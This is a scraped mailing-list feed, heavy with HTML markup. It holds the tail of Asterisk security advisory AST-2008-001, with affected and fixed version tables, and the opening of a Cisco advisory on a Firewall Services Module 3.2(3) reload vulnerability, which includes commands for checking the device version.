&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | 1.4.17 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | Asterisk Business Edition &amp;nbsp;| &amp;nbsp; &amp;nbsp;A.x.x &amp;nbsp; &amp;nbsp;| Unaffected &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | Asterisk Business Edition &amp;nbsp;| &amp;nbsp; &amp;nbsp;B.x.x &amp;nbsp; &amp;nbsp;| Unaffected &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | Asterisk Business Edition &amp;nbsp;| &amp;nbsp; &amp;nbsp;C.x.x &amp;nbsp; &amp;nbsp;| All versions prior to &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | C.1.0-beta8 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;AsteriskNOW &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | pre-release | All versions prior to beta7 |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; Asterisk Appliance &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; SVN &amp;nbsp; &amp;nbsp; | All versions prior to &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; Developer Kit &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | Asterisk 1.4 revision 95946 |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | s800i (Asterisk Appliance) | &amp;nbsp; &amp;nbsp;1.0.x &amp;nbsp; &amp;nbsp;| All versions prior to &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | 1.0.3.4 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Corrected In &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp;Product &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Release &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------+--------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | Asterisk Open | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1.4.17, available from &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp;Source &amp;nbsp; &amp;nbsp; | &amp;nbsp; &lt;a href=&quot;http://downloads.digium.com/pub/telephony/asterisk&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.digium.com/pub/telephony/asterisk&lt;/a&gt;&amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------+--------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; Asterisk &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; C.1.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; Business &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp;Edition &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------+--------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp;AsteriskNOW &amp;nbsp;| &amp;nbsp; Beta7, available from &lt;a href=&quot;http://www.asterisknow.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.asterisknow.org/&lt;/a&gt;. &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; Beta5 and Beta6 users can update using the system &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; update feature in the appliance control panel. &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------+--------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; Asterisk &amp;nbsp; &amp;nbsp;| &amp;nbsp;Asterisk 1.4 revision 95946. Available by performing &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; Appliance &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;an svn update of the AADK tree. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | Developer Kit | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------+--------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; s800i &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;1.0.3.4 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; (Asterisk &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp;Appliance) &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp;Links &amp;nbsp; &amp;nbsp; &amp;nbsp; | &lt;a href=&quot;http://bugs.digium.com/view.php?id=11637&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://bugs.digium.com/view.php?id=11637&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp; | Asterisk Project Security Advisories are posted at &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &lt;a href=&quot;http://www.asterisk.org/security&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.asterisk.org/security&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | This document may be superseded by later versions; if so, the latest &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | version will be posted at &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &lt;a href=&quot;http://downloads.digium.com/pub/security/AST-2008-001.pdf&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.digium.com/pub/security/AST-2008-001.pdf&lt;/a&gt;&amp;nbsp;and &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &lt;a href=&quot;http://downloads.digium.com/pub/security/AST-2008-001.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.digium.com/pub/security/AST-2008-001.html&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Revision History &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; Date &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; Editor &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Revisions Made &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |------------------+--------------------+--------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | 2008-01-02 &amp;nbsp; &amp;nbsp; &amp;nbsp; | Joshua Colp &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| Initial Release &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Project Security Advisory - AST-2008-001
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Copyright (c) 2007 Digium, Inc. All Rights Reserved.
&lt;br&gt;&amp;nbsp; &amp;nbsp;Permission is hereby granted to distribute and publish this advisory in its
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; original, unaltered form.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/AST-2008-001%3A-Crash-from-transfer-using-BYE-with-Also-header-tp14604557p14604557.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14445449</id>
	<title>Cisco Security Advisory: Application Inspection Vulnerability in Cisco Firewall Services Module</title>
	<published>2007-12-19T07:20:00Z</published>
	<updated>2007-12-19T07:20:00Z</updated>
	<author>
		<name>Cisco Systems Product Security Incident Response Team</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&lt;br&gt;Cisco Security Advisory: Application Inspection Vulnerability in Cisco
&lt;br&gt;Firewall Services Module
&lt;br&gt;&lt;br&gt;Advisory ID: cisco-sa-20071219-fwsm
&lt;br&gt;============
&lt;br&gt;&lt;br&gt;Revision 1.0
&lt;br&gt;============
&lt;br&gt;&lt;br&gt;Last Updated 2007 December 19 1600 UTC (GMT)
&lt;br&gt;&lt;br&gt;For Public Release 2007 December 19 1600 UTC (GMT)
&lt;br&gt;&lt;br&gt;Summary
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;A vulnerability exists in the Cisco Firewall Services Module (FWSM) 
&lt;br&gt;- - - a high-speed, integrated firewall module for Cisco Catalyst 6500 
&lt;br&gt;switches and Cisco 7600 Series routers, &amp;nbsp;that may result in a reload
&lt;br&gt;of the FWSM. &amp;nbsp;The only affected FWSM System Software Version is 
&lt;br&gt;3.2(3).
&lt;br&gt;&lt;br&gt;There are no known instances of intentional exploitation of this 
&lt;br&gt;issue. However, Cisco has observed data streams that appear to be
&lt;br&gt;unintentionally triggering this vulnerability.
&lt;br&gt;&lt;br&gt;Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5584
&lt;br&gt;has been assigned to this vulnerability.
&lt;br&gt;&lt;br&gt;Cisco will release free software updates that address this 
&lt;br&gt;vulnerability.
&lt;br&gt;&lt;br&gt;A workaround that mitigates this vulnerability is available.
&lt;br&gt;&lt;br&gt;This advisory is posted at 
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Affected Products
&lt;br&gt;=================
&lt;br&gt;&lt;br&gt;Vulnerable Products
&lt;br&gt;+------------------
&lt;br&gt;&lt;br&gt;The FWSM is vulnerable if running System Software version 3.2(3).
&lt;br&gt;&lt;br&gt;&lt;br&gt;To determine if the FWSM is vulnerable, issue the &amp;quot;show module&amp;quot; 
&lt;br&gt;command-line interface (CLI) command from Cisco IOS or Cisco CatOS
&lt;br&gt;to identify what modules and sub-modules are installed in the 
&lt;br&gt;system.
&lt;br&gt;&lt;br&gt;The following example shows a system with a Firewall Service Module 
&lt;br&gt;(WS-SVC-FWM-1) installed in slot 4.
&lt;br&gt;&lt;br&gt;switch#show module
&lt;br&gt;&amp;nbsp;Mod Ports Card Type &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Model &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Serial No.
&lt;br&gt;&amp;nbsp;--- ----- -------------------------------------- ----------------- -----------
&lt;br&gt;&amp;nbsp;1 &amp;nbsp; 48 &amp;nbsp; &amp;nbsp;SFM-capable 48 port 10/100/1000mb RJ45 WS-X6548-GE-TX &amp;nbsp; &amp;nbsp;SAxxxxxxxxx
&lt;br&gt;&amp;nbsp;4 &amp;nbsp; &amp;nbsp;6 &amp;nbsp; &amp;nbsp;Firewall Module &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;WS-SVC-FWM-1 &amp;nbsp; &amp;nbsp; &amp;nbsp;SAxxxxxxxxx
&lt;br&gt;&amp;nbsp;5 &amp;nbsp; &amp;nbsp;2 &amp;nbsp; &amp;nbsp;Supervisor Engine 720 (Active) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; WS-SUP720-BASE &amp;nbsp; &amp;nbsp;SAxxxxxxxxx
&lt;br&gt;&amp;nbsp;6 &amp;nbsp; &amp;nbsp;2 &amp;nbsp; &amp;nbsp;Supervisor Engine 720 (Hot) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;WS-SUP720-BASE &amp;nbsp; &amp;nbsp;SAxxxxxxxxx
&lt;br&gt;&lt;br&gt;After locating the correct slot, issue the show module &amp;lt;slot number&amp;gt; 
&lt;br&gt;command to identify the software version that is running.
&lt;br&gt;&lt;br&gt;switch#show module 4
&lt;br&gt;&amp;nbsp;Mod Ports Card Type &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Model &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Serial No.
&lt;br&gt;&amp;nbsp;--- ----- -------------------------------------- ----------------- -----------
&lt;br&gt;&amp;nbsp;4 &amp;nbsp; &amp;nbsp;6 &amp;nbsp; &amp;nbsp;Firewall Module &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;WS-SVC-FWM-1 &amp;nbsp; &amp;nbsp; &amp;nbsp;SAxxxxxxxxx
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mod MAC addresses &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Hw &amp;nbsp; &amp;nbsp; Fw &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Sw &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Status
&lt;br&gt;&amp;nbsp;--- --------------------------------- ------ ------------ ------------ -------
&lt;br&gt;&amp;nbsp;4 &amp;nbsp; 0003.e4xx.xxxx to 0003.e4xx.xxxx &amp;nbsp;3.0 &amp;nbsp; &amp;nbsp;7.2(1) &amp;nbsp; &amp;nbsp; &amp;nbsp; 3.2(3) &amp;nbsp; &amp;nbsp; &amp;nbsp; Ok
&lt;br&gt;&lt;br&gt;The preceding example shows that the FWSM is running version 3.2(3)
&lt;br&gt;as indicated by the column under &amp;quot;Sw&amp;quot; above.
&lt;br&gt;&lt;br&gt;Note: Recent versions of Cisco IOS will show the software version of
&lt;br&gt;each module in the output from the show module command; therefore, 
&lt;br&gt;executing the show module &amp;lt;slot number&amp;gt; command is not necessary.
&lt;br&gt;&lt;br&gt;Alternatively, the information can also be obtained directly from the
&lt;br&gt;FWSM through the show version command as seen in the following
&lt;br&gt;example.
&lt;br&gt;&lt;br&gt;&amp;nbsp; FWSM#show version
&lt;br&gt;&amp;nbsp; FWSM Firewall Version 3.2(3)
&lt;br&gt;&lt;br&gt;Customers who use the Cisco Adaptive Security Device Manager (ASDM) 
&lt;br&gt;to manage their devices can find the version of the software displayed
&lt;br&gt;in the table in the login window or in the upper left corner of the
&lt;br&gt;ASDM window. The version notation is similar to the following example.
&lt;br&gt;&lt;br&gt;&amp;nbsp; FWSM Version: 3.2(3)
&lt;br&gt;&lt;br&gt;Products Confirmed Not Vulnerable
&lt;br&gt;+--------------------------------
&lt;br&gt;&lt;br&gt;&amp;nbsp; * FWSM System Software versions 3.2(2) and earlier.
&lt;br&gt;&amp;nbsp; * FWSM System Software versions 3.1(x).
&lt;br&gt;&amp;nbsp; * FWSM System Software versions 1.x(y) and 2.x(y).
&lt;br&gt;&amp;nbsp; * The Cisco PIX 500 Series Security Appliance (PIX)
&lt;br&gt;&amp;nbsp; * The Cisco 5500 Series Adaptive Security Appliance (ASA).
&lt;br&gt;&lt;br&gt;No other Cisco products are currently known to be affected by this
&lt;br&gt;vulnerability.
&lt;br&gt;&lt;br&gt;Details
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;A vulnerability exists in the processing of data in the 
&lt;br&gt;control-plane path with Layer 7 Application Inspections, that may
&lt;br&gt;result in a reload of the FWSM. The vulnerability can be triggered
&lt;br&gt;with standard network traffic, which is passed through the
&lt;br&gt;Application Layer Protocol Inspection process.
&lt;br&gt;&lt;br&gt;The only FWSM release affected by this vulnerability is FWSM System
&lt;br&gt;Software version 3.2(3). 
&lt;br&gt;&lt;br&gt;This vulnerability is documented in Cisco bug ID CSCsl08519.
&lt;br&gt;&lt;br&gt;Vulnerability Scoring Details
&lt;br&gt;=============================
&lt;br&gt;&lt;br&gt;Cisco has provided scores for the vulnerabilities in this advisory
&lt;br&gt;based on the Common Vulnerability Scoring System (CVSS). The CVSS
&lt;br&gt;scoring in this Security Advisory is done in accordance with CVSS
&lt;br&gt;version 2.0.
&lt;br&gt;&lt;br&gt;CVSS is a standards-based scoring method that conveys vulnerability
&lt;br&gt;severity and helps determine urgency and priority of response.
&lt;br&gt;&lt;br&gt;Cisco has provided a base and temporal score. Customers can then
&lt;br&gt;compute environmental scores to assist in determining the impact of
&lt;br&gt;the vulnerability in individual networks.
&lt;br&gt;&lt;br&gt;Cisco has provided an FAQ to answer additional questions regarding
